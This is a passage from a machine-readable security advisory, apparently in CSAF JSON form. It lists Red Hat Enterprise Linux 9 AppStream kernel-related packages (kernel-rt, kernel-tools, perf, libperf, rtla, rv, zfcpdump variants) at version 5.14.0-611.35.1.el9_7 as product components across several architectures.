"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.ppc64le",
